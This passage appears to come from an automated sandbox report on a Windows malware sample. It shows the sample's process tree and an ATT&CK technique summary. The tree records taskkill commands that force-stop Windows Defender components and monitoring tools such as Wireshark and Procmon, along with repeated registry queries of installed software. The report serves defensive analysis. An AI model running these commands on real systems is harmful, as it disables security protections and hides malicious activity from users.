    3⤵
    PID:4632
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4764
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4484
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:3844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4588
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:4736
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:3812
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4912
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:4836
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:5036
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:5084
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:2992
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:3048
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3480
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:4108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:4448
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:4488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4784
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4764
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:3276
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4836
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:5024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4844
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:4660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4196
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3048
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5060
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:4632
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4768
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:4672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:3276
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2912
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4448
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:2252
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:4592
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3048
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:3576
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4356
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4104
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4164
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4700
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:5136
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:5160
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4800
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5172
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:5224
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:5240
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5264
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:5296
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:5308
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:5360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:5376
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:5424
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:5440
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:5488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:5504
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:5572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:5596
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5548
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5668
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5764
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5820
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5876
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5932
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5988
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:6044
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:6100

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads